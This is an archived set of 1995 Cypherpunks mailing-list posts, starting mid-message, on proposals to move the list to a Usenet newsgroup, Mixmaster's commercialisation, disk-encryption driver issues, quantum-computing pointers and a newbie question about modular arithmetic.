seems to work differently than what I've seen before, i.e.: C/C++ MOD. I 
also didn't see anything in TCM's FAQ...

If this is considered noise, I apologize in advance.


"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 16 Sep 95 12:40:45 PDT
To: cypherpunks@toad.com
Subject: cypherpunks as a newsgroup
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <43f97c$64n@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <PysiBD7w165w@bwalk.dm.com>,
Dr. Dimitri Vulis <dlv@bwalk.dm.com> wrote:
>aba@dcs.exeter.ac.uk writes:
>> One thing I have been thinking would be nice would be a USENET
>> newsgroup, as mailing lists are a step away from easy access which
>> some people never make.
>
>This sounds like a very good idea to me, since I find the flood of
>e-mail from CP, much of it non-crypto-related, to be annoying. If
>this traffic were in a newsgroup, it would travel compressed over
>my phone line, and I might use a killfile on sstuff like the CO$ thread.
>
>Anything posted to the main cypherpunks mailing list and the spun-off mailing
>lists (steganogrpahy, remailers, nym servers, etc) could be posted to the
>newsgroup by maiking one of the mail2news gateways a subscriber.

That was my thinking exactly.  That's why I wrote just such a mail2news
gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with
cypherpunks@toad.com as the moderator), as you can probably see in
the header.

This way, trn groups all articles with the same subject together,
and correctly threads articles that have References: or In-Reply-To:
headers.

As for the location, I'd agree with comp.security.cypherpunks.

Watch out, though; the list/group will probably get a much higher
readership as a newsgroup.  Although this is good for the
"make the public aware" goal, remember that, as far as I can tell,
September 1992 never ended.

I've been very impressed with the signal/noise ratio on this list.
In fact, people often put [NOISE] in the subject line to flag trivial
content.  This ratio will certainly go down if we go to a newsgroup.

One of the main benefits of Usenet is that anyone can _post_.
One of the main detriments is that _anyone_ can post.

   - Ian "that would have been much more elegant in Latin"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dsc@swcp.com)
Date: Wed, 20 Sep 95 17:27:35 PDT
To: cypherpunks@toad.com
Subject: (NOISE) X-FILES ANARCHIST
Message-ID: <9509201552126919@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 16 Sep 1995 09:56:59 -0600
To: cypherpunks@toad.com
From: dsc@swcp.com (Dar Scott)
Subject: (Noise) X-Files anarchist

I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
minor character was a cryptohacker who--to his surprise--brute-forced a
military key for some files.  He was described as an anarchist.

To _my_ surprise, this anarchist was not associated with violence or
lunatic ravings.  He was shown as reading a book entitled something like
Survey of Modern Conspiracy Theories.  I see this as an improvement in the
stereotype of computer-associated anarchists.  And this I see as a good
thing, since I think there is a lot that could be learned from anarchists.


I think the character was killed, but I may have missed something.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sat, 16 Sep 95 09:22:27 PDT
To: dlv@bwalk.dm.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <15408.9509161506@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis <dlv@bwalk.dm.com> writes:
> Anything posted to the main cypherpunks mailing list and the
> spun-off mailing lists (steganogrpahy, remailers, nym servers, etc)
> could be posted to the newsgroup by maiking one of the mail2news
> gateways a subscriber.

Not sure that would be a good idea, then the news group would *be*
cypherpunks, and the cypherpunks list would have effectively become a
USENET newsgroup (albiet with some mail2news stuff behind).  For me
part of the fun of cypherpunks is that things get discussed here which
don't get discussed anywhere else, things happen here 1st, rc4 leak,
that kind of thing, if it's happening crypto wise, it's on
cypherpunks.

You might lose some of the community feel to it if it was gated
straight to a USENET group, I mean at that point the majordomo list
server would have become a news2mail gateway.

I was thinking more that you would have a separate newsgroup, but
perhaps my feelings are more of the elitist stuff Peter was referring
to, still I see no need to change a good thing, can't the two co-exist
separately, Peter's stated aims didn't co-incide with my perception of
the cypherpunks lists goals.  ie the list (modulo cpunks write code
wars) seems to me to be about people who share the common goal of free
crypto for everyone, discussing how to go about this, writing code to
help it happen, and analysis of what the government is up to where it
infringes on cypherpunk goals.  I think Peter's goals sounded more
amenable to a forum which was a) easily accessible, and b) had a
stated aim of a kind of cypherpunk technology transfer forum.

Perhaps I am being eliteist, so shoot me, but I like cypherpunks the
list the way it is!

For your convenience reading cpunks there are a couple of solutions to
the deluge of mail problem: there used to be a nntp server at
nntp.hks.net which nntp served cypherpunks as a newsgroup (I haven't
used this in a while as it appeared to be down or empty or somthing
for a while), there are filters which you can set up to put all cpunks
traffic in a separate mbox, and there are a couple of digest forms of
cpunks around also.  The filter won't help your down load time, the
digest (I think Hal offers / was offering an encrypted digest which
would also be compressed) and the nntp server might.

> > Reckon cypherpunks as a group has enough readers to hmm, push through
> > a vote for group creation, if the majority thought it was a useful
> > exercise.  A group soley for what?  cypherpunks technology, social
> 
> No vote is needed to create an alt.group: something like
> 'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal
> to alt.config, post many articles seconding the proposal, let it be discussed
> for a week, then issue a newgroup.

Me, I quite like the cypherpunk name, I reckon it would be best from a
distribution pov to get a big8 group, as you discuss.

> To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to
> deal with unpleasant control freaks like group-advice, news.groups,
> and David Lawrence.  It takes up to 6 months. On the other hand,
> many sites that have Usenet have comp.* but not alt.*. Their users
> would still have to use the mailing lists or find another site. To
> create something like comp.security.cypherpunks (I think this would
> be the most appropriate place, since there's already c.s.announce,
> c.s.misc, and c.s.firewalls), talk to the group-advice cabal.

I'll let other people argue about newsgroups names.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@nntp.com>
Date: Sat, 16 Sep 95 13:09:22 PDT
To: remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
Message-ID: <199509162008.QAA06266@nntp.com>
MIME-Version: 1.0
Content-Type: text/plain


>The concern is not "commercialization", per se, but rather the use
>of "commercialization" as an excuse to build in "proprietary"
>features (Back doors?) for which no corresponding source code is
>involved.
>
>Since no one has made a good case for there even being a COMMERCIAL
>market for Mixmaster, could there be other motives?  ...
>
>No, I'm not accusing Lance.  But if he no longer has the time to
>support Mixmaster, then perhaps some other crypto-friendly group
>should take over the task and keep it an OPEN system, with source
>code available.  In fact, even freezing Mixmaster as is would be
>preferable to "improvements" that people don't/can't trust.

This doesn't make sense.

Someone wants to commercialize Mixmaster.  You don't know who it is,
but you since you can't see how to make money doing this, you suspect
their motives.  Yet on the other hand, you think they will be so
successful that enough people will buy binary-only servers such that
backdoors are a real threat, perhaps by forcing people to upgrade
or otherwise breaking interoperability with the current free-source
remailer network.

You can't have it both ways.

But even if you could, there's a solution. :)  Download the source
and start releasing "blender", a free-source anonymous remail system
that is upwardly compatibly, *and based on* the current Mixmaster.
	/r$
s




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sat, 16 Sep 95 14:44:19 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: AOL monitoring
In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com>
Message-ID: <Pine.BSD.3.91.950916164152.24414C-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the kewl.rad.tip

Love Always,

Carol Anne

On Sat, 16 Sep 1995, Vladimir Z. Nuri wrote:

> hello, apparently the recent FBI sting happened with the cooperation
> of AOL, which allowed the FBI to monitor downloads..
> 
> here's some info to test if you are being monitored on AOL

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: darkness@darkness.vnet.net
Date: Sat, 16 Sep 95 13:55:25 PDT
To: cypherpunks@toad.com
Subject: Re: SecureDrive News - Win95 yes, Iomega zip drive no
In-Reply-To: <199509162013.NAA06723@desiree.teleport.com>
Message-ID: <199509162056.QAA03317@darkness.vnet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Sat, 16 Sep 1995 13:13:49 -0700
>From: Alan Olsen <alano@teleport.com>
>
>At 02:33 AM 9/16/95 PDT, you wrote:
>
>>I'm sorry to report that SecureDrive does not support the Iomega ZIP
>>drive.  I believe that's because the TSR driver supplied with the
>>hardware does not support a DiskBIOS interface.
>>
>>I had thought that Secure Device, another real-time encryption system,
>>would support this drive, since it works through a device driver
>>mapped to a dos file.  But an actual trial proved otherwise.  The
>>problem is that the DOS file must be present when the CONFIG.SYS
>>DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
>>driver is a TSR that doesn't get loaded until after all DEVICE
>>statements have been processed.
[...]

	Have you tried an 'INSTALL=' line in the CONFIG.SYS to load
the drive's TSR first?  INSTALL is a rarely-documented feature for the
CONFIG.SYS to load a TSR during its processing.  I believe it also
saves memory by not loading some sort of header to into memory (DOS
PSP maybe?), which may also cause a problem.  Can't hurt to try
though, eh?

darky
- --
============================================+================================
darkness (darky)   || keys under 'darkness' | 596F7527766520676F742061206672
PGP mail preferred || Key on public servers | 69656E6420696E204269672042726F
     email: darkness@darkness.vnet.net      | 746865722053656375726974792E0A
KeyID: D7E4CA65 / PGPprint = 43 1A 4A 36 4E 79 55 40  04 A1 CA F0 B9 BC 45 86


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFs6EpaAhnnX5MplAQGCUQP9Fb2oUikx9qEHJXBb4nZHtTjZewwn9FZt
UZFxAf42IOyCFKxayanJTkwWkJQqDvetg1P0wvOrK+IRWxvmfvxze/pXQBrGAaqS
oKGdhW0C5Wjol2ffgATh0K3a3ztd/klRd0dySQMISxz/DTcqvTxtW5n7+965VJT+
5akW4nJL558=
=YrYU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Sat, 16 Sep 95 14:14:07 PDT
To: cypherpunks@toad.com
Subject: Rosing's Elliptic curve documentation question
Message-ID: <199509162113.AA09748@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


I was reading Mike Rosing's documentation for his elliptic curve
system from the Cypherpunks FTP site.  In it, he uses the notation:
sum a_i*b^2^i
	Now, like a good little Calculus 2 student, I assumed this must be a
regular summation.  But if so, which is the index of summation, and
what are the bounds of summation?  Someone want to give me a clue as
to what this notation means?
						Dan Bailey
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rshea@netcom.com (rex)
Date: Sat, 16 Sep 95 20:00:16 PDT
To: cypherpunks@toad.com
Subject: cypherpunks as a newsgroup
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <Gt2WwMNwPV6f084yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <43f97c$64n@calum.csclub.uwaterloo.ca>, you wrote:
>Dr. Dimitri Vulis <dlv@bwalk.dm.com> wrote:
>>
>>Anything posted to the main cypherpunks mailing list and the spun-off mailing
>>lists (steganogrpahy, remailers, nym servers, etc) could be posted to the
>>newsgroup by maiking one of the mail2news gateways a subscriber.
>
>That was my thinking exactly.  That's why I wrote just such a mail2news
>gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with
>cypherpunks@toad.com as the moderator), as you can probably see in
>the header.
>
>This way, trn groups all articles with the same subject together,
>and correctly threads articles that have References: or In-Reply-To:
>headers.

Some readers may not know they can use Yarn/UQWK under DOS or OS/2 to
read this list as if it were a newsgroup.  Yarn has Filters which can
be used to move email from various lists to pseudo-newsgroups, and the
threading, References, etc, work nicely.  PGP signing/encryption is a
menu choice. A hook for a MIME processor is provided. Trn filters may
be used to filter the real newsgroups before the mail and news is
packed by into a SOUP packet by UQWK.

There is a Yarn list: yarn-list@lists.colorado.edu

More info: http://www.nic.com/~cannon/handson.html

- -rex


-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBMFt0+W8sjl9sYg/JAQF83AP7BgfWOaiAZQc+3A2UPQ8ej8GgdqyaUbKc
vqmVUldOp9WrRsP9LZUxgW8MWd0FfWFKOpttlvfPdsrmU1CPcb9G+Qh8dc05iEIW
CFBTDo2z6F8qcEtS0gnG0SGEjIvSEMAxOvurTs5qfGhSgcBnbPdpmTMgElOIJCeO
hqiM+jGFd1E=
=U+24
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 14:44:32 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: cypherpunks as a newsgroup
In-Reply-To: <199509162041.NAA10780@desiree.teleport.com>
Message-ID: <Pine.SUN.3.91.950916174240.1443A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 16 Sep 1995, Alan Olsen wrote:


> I have a group of friends who get forwarded the "best" of the Cypherpunks
> list.  The signal to noise ratio is high enough that I have to be careful
> how much I forward lest I get complaints at the volume of what I forward.
> Turning this into an alt group would destroy that.


I don't understand this tendency to want to TURN the list into anything.

Leave the list, and start an alt.* group if you like.

I prefer the list, but will look at the group from time to time.

Why must this be an either/or choice?


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 16 Sep 95 15:53:31 PDT
To: cypherpunks@toad.com
Subject: Look, a *.cypherpunk group already exists!
Message-ID: <199509162253.PAA26158@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Over here at Primenet, there is a newsgroup called
mail.cyperpunks. It came in as a newgroup a couple
of weeks ago. New articles posted to it make the list.

I'm amazed we haven't been commercially spammed yet!

But it's there already. Just in the mail hiearchy that's all.

alt.cypherpunks? ohmigawd! Sheesh!

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 16 Sep 95 16:54:06 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <9509161930.AA08524@spirit.aud.alcatel.com>
Message-ID: <199509162353.RAA06965@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Several people are working on improvements to netnews which allow more active
filtering.  The most promising techniques that I have heard about involve a
lot of "ratings" being generated by readers and then taken into account by
other readers when filtering/sorting the articles.


I am perfectly happy with the social scene on the cypherpunks list as is, and
I think those who want to move to a newsgroup don't know what they are asking
for.  (Go read sci.crypt and talk.politics.crypto for awhile.  I expect an
"alt.cypherpunks" would be indistinguishable from those two in short order.)


BUT, I was thinking that this group (I mean, this group of people) would make
an excellent group to test this new technology.  Think about it:  Perry
Metzger could routinely give conspiracy articles/authors a "-10" rating, and
those of us who agreed with him could set our "Perry coefficients" to
indicate the degree to which we agree with his evaluations.  Thus we might
actually gain a *higher* SNR by moving to UseNet.  (And it would provide an
exciting example of reputations in action...)


I don't know if the technology is there yet, or if it is accessible to most
of our readers.  One person who is working on such a scheme is "(cm)", or 
"na48985@anon.penet.fi".  I have added his name to the Cc: line so perhaps he
would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.


Bryce

signatures follow:


                                    +                                        
      public key on keyservers      /.      island Life in a chaos sea       
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu    
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4

iQCVAwUBMFtjUvWZSllhfG25AQHSoAP/aH1kzLO+JYzlPqdAA9Zeb7JpeWbt4xEI
WH0HCP+sjEFgsW/sXpEpjT5TuMe3/FyGAJFZTN0l8SLythYuFJauGs5xf2tEv8OQ
3q5jTq4pztMbvD9FnlFeU4kfcg5yJkvy9KDebfxtRAfDvIz6BTxGuNkJ18rJBXlY
OCg+mm8vYmc=
=paQk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 16 Sep 95 18:29:34 PDT
To: mix-l@jpunix.com
Subject: Re: Mixmaster status changing
Message-ID: <199509170127.SAA20213@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:04 PM 9/14/95 -0700, Lance Cottrell wrote:
>There has been an offer to purchase and commercially develop Mixmaster.
>This will hasten the development of Mixmaster for other platforms (e.g.
>Dos, Windows  Macintosh), and bring significant improvements to the
>interface, but I will not compromise on the level of security provided by
>Mixmaster. Free client software will continue to be available.

This is great, but of course what we urgently need is a free windows
client.

What is the score on this?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sat, 16 Sep 95 16:31:02 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <Pine.OSF.3.91.950916182959.29773A-100000@beall.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Check out the newest issue of Scientific American.

Dan


On Fri, 15 Sep 1995, Jeff Simmons wrote:

> Could anyone point me to information on 'quantum' computing?
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 16 Sep 95 10:53:11 PDT
To: hallam@w3.org
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <Pine.3.89.9509161836.A25771-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Sep 1995 hallam@w3.org wrote:

> One thought to ponder on. There is no real difference in terms of resources 
> required between a mailing list and an archive of a mailing list at a Web 
> site. The latter does avoid a large number of unnecessary dispatches however.

However:

a) You can't read it through a remailer (yet).

b) Anyone watching the site can tell which threads you're interested in, 
and thereby determine what your real interests in this group are.

c) It cuts off anyone who doesn't have direct net access, or can't afford 
long telephone calls. It's a lot cheaper to download a day's mail in one 
go than to spend three hours browsing a WWW site.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 16 Sep 95 04:45:56 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Quantum computing info?
In-Reply-To: <199509160259.TAA03727@goblin.punk.net>
Message-ID: <Pine.LNX.3.91.950916190030.5451A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Sep 1995, Jeff Simmons wrote:

> Could anyone point me to information on 'quantum' computing?

Two good starting point are:

 http://vesta.physics.ucla.edu/~smolin/index.html

and, in Oxford:

 http://eve.physics.ox.ac.uk/QChome.html

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 16 Sep 95 11:20:08 PDT
To: Alan Barrett <barrett@iafrica.com>
Subject: Re: [NOISE] Re: Linking = Showing = Transferring?
In-Reply-To: <v01510101ac7e7081b71f@[198.59.115.134]>
Message-ID: <9509161819.AA08057@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Alan Barrett writes:
 > > I wonder if I have a pornopage.
 > Of course you do (assuming the stupid transitive definition of a
 > pornopage). 

 > Start at your home page
[...]
One could define some kind of new metrics let dp(x) shortest number of
hops to go from page x to any "porn" (sexy) page,
Now, I bet that dp(x) < infinity for any page x that have links on
their site that goes outside their site, thanks to the "strange
attractor" represented by search engines & index, which are the most
linked pages

<dp(x)> (mean dp) is prolly around 4 or 5

For instance, what is the pornography distance of whitehouse ? 
Without complete search, their dp(http://www.whitehouse.gov/)<=7 :

-> textual representation of this page.  {sorry, i had to go there,using lynx}
http://www.whitehouse.gov/White_House/html/White_House_Home-plain.html
-> Executive Branch
(http://www.whitehouse.gov/White_House/EOP/html/3_parts-plain.html)
-> government information locator service (GILS)
(http://info.er.usgs.gov/gils/index.htm)
-> IMAGINATION NEEDED HERE!
(http://www.usgs.gov/public/gils/imagine.html)
-> [Other Topics]   {lots of remote pointers, but lots of outdated links too}
(http://www.usgs.gov/public/gils/other.html)
-> Another List of Internet Search facilities {netscape's search page}
(http://home.mcom.com/home/internet-search.html)
Search for "playboy" for instance at infoseek, or anything in
fact... (btw where is that fast playboy's mirror ?)
-> sexy pages!

Regards
dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 20:28:47 PDT
To: Greg Broiles <cypherpunks@toad.com
Subject: [ASSENT NOISE] Re: C-punks, marketing for the masses
Message-ID: <ac80e18f18021004beea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:08 PM 9/16/95, Greg Broiles wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>No disrespect intended, but I think that the various "let's sanitize
>the Cypherpunk message for mass acceptance" marketing/soundbite
>proposals are pointless. Cypherpunks is a mailing list, not a political
>party (or a platform).
>
>- From my perspective, the organizing meme for the list is not "strong
>crypto is really important, so let's write some and lobby our lawmakers
>to make sure it stays legal" but "strong crypto is here and is changing
>the dynamics of force, politics, and power, so let's see what we can
>do with it."

Hear, hear! Greg is absolutely right.

(And Dave Mandl was, too, about our mailing list not being a corporation
trying to increase market share.)

I applaud the efforts to lobby Congresscritters to vote in ways we would
find desirable (though I note with some irony that the Congressman who has
come out most strongly _against_ Net censorship is Newt Gingrich, often
demonized by many. To the credit of EFF and EPIC, and others of that ilk,
they noted this fact.)

But as Greg points out, we are not a political party. More to the point, we
have no centralized resources, no staff, no travel budgets, no ability to
appoint spokespunks to speak to the media. This is a weakness, and a
strength.

I think it was Bill Stewart who noted that the "conventional" cyberspace
lobbying groups, such as EFF, EPIC, CPSR, etc., are largely
"director-driven," with a handful (or just one or two) directors making
decisions, speaking publically, and getting all the attention.

The Cypherpunks group is not like that. Lacking any formalized leadership,
and--most importantly--lacking offices in D.C., we can't be asked to
perform like the usual trained seals who produce the soundbites that fit
into the stories too many reporters want. Again, a weakness and a strength.

I sense in the debate here that some of us want to have more of an impact,
more of a political impact. The cynic in me says these people have just not
been in the game long enough to become realists (to a cynic, cynicism is
realism).

>(And no, I don't think it's important to spread that "meme" (a term
>I use with some trepidation) around to get "market share" for it.
>Ideas are not football teams nor initiative proposals.)
>
>I appreciate and support and have participated in various write-yer-
>legislator activities. They're useful short-term. But if Tim May and
>Duncan Frissell and the other list members who've dared to make predictions
>about the impact of crypto on government and economics are correct,
>what the government and the legislators want doesn't matter. If they're
>wrong, what we want doesn't matter.

I suppose it is mainly Duncan and I that make these points, with
contributions also from Sandy Sandfort, Black Unicorn, Lucky Green, and
others (sorry if I've left you out of the Cryto Anarchy Hall of
Shame^H^H^H^H^H Fame).

Please understand that I am not elitist in the sense of wishing to limit
access to ideas many of us espouse. I discourage no one from calling in to
radio talk shows, from writing articles, and so on.

But I'm not convinced that "political action" matters very much. As Greg
puts it, if we're right, politics won't matter. And if we're wrong,
politics won't matter.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Sat, 16 Sep 95 17:40:41 PDT
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <ac80d4a51e02100402b9@[199.125.128.5]>
Message-ID: <Pine.3.89.9509162002.A11836-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain



>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>is curiosity." 

It may not be a crime, but it's not nice to steal a title.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 16 Sep 95 17:41:19 PDT
To: cypherpunks@toad.com
Subject: Re: (noise) Re: SPAM bait
In-Reply-To: <199509161913.PAA55049@tequesta.gate.net>
Message-ID: <199509170041.CAA29649@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> What I don't understand about inappropriate SPAMs like that one
> (or telephone ads) is; what's the business incentive to do it?
> I assume that no Cypherpunk has subscribed to "Janet's" magazines,
> and I know that no Ray has _EVER_ spent money over a telephone
> unless we initiated the call, yet *still* we get unwanted calls
> every once-in-a-while. WHY?

Well, that may be true, but I'd suspect that the average IQ on this
list is significantly higher than the net at large.  So if you spammed
enough newsgroups, chances are that you'd find a sucker somewhere.

Even tho it is becoming more common for marketing firms to keep
databases of who buys (or doesn't buy) what, I suspect that a lot of
calling is still done at random (the local newspaper still calls us
even tho we have subscribed for years and told them several times that
they are wasting their time calling.  So I suspect it is just done at
random.)

These days, many telemarketers have autodialers that call ahead and then
connect a salesman after you have answered the phone.  So if I get a call,
say hello, and hear silence and then a click of being transfered to the
next available salesperson, that it is my cue to hang up. 

> [Please respond privately to liberty@gate.net ]

uh, well at least this post is labelled 'noise' for the mailfilters...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 20:41:15 PDT
To: Childers James <cypherpunks@toad.com
Subject: Re: Newbie Crypto question: MOD?
Message-ID: <ac80e66d19021004e38b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:39 PM 9/16/95, Childers James wrote:
>Ok folks, I recently received "Applied Cryptography" as a gift, and just
>have one question: How does the MOD function work in crypto functions? It
>seems to work differently than what I've seen before, i.e.: C/C++ MOD. I
>also didn't see anything in TCM's FAQ...
>
>If this is considered noise, I apologize in advance.

I didn't put anything in my FAQ about "mod" because my FAQ was not a crypto
FAQ per se, of which there are at least two. (Cf. sci.crypt for regular
pointers.)

And I doubt that either of these FAQs discusses the mod function, though I
haven't checked.

In any case, Schneier devotes several pages to mod, starting with "You all
learned modular arithmetic in school; it was called "clock arithmetic"" (p.
198).

After defining it, Schneier goes on to discuss its use in modern cryptography.

If this isn't enough of an explanation, I don't know what more to say.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date: Sat, 16 Sep 95 13:10:51 PDT
To: cypherpunks@toad.com
Subject: More on ECheques
Message-ID: <1995-Sep16-205309.1>
MIME-Version: 1.0
Content-Type: text/plain


unicorn@polaris.mindport.net wrote:
>> 1. I was not suggesting that you put your real bank account number
>>     in the program.  A test number is perfectly adequate.

>(But I will clone some checks and drain your account quickly).

Really ..... how.  






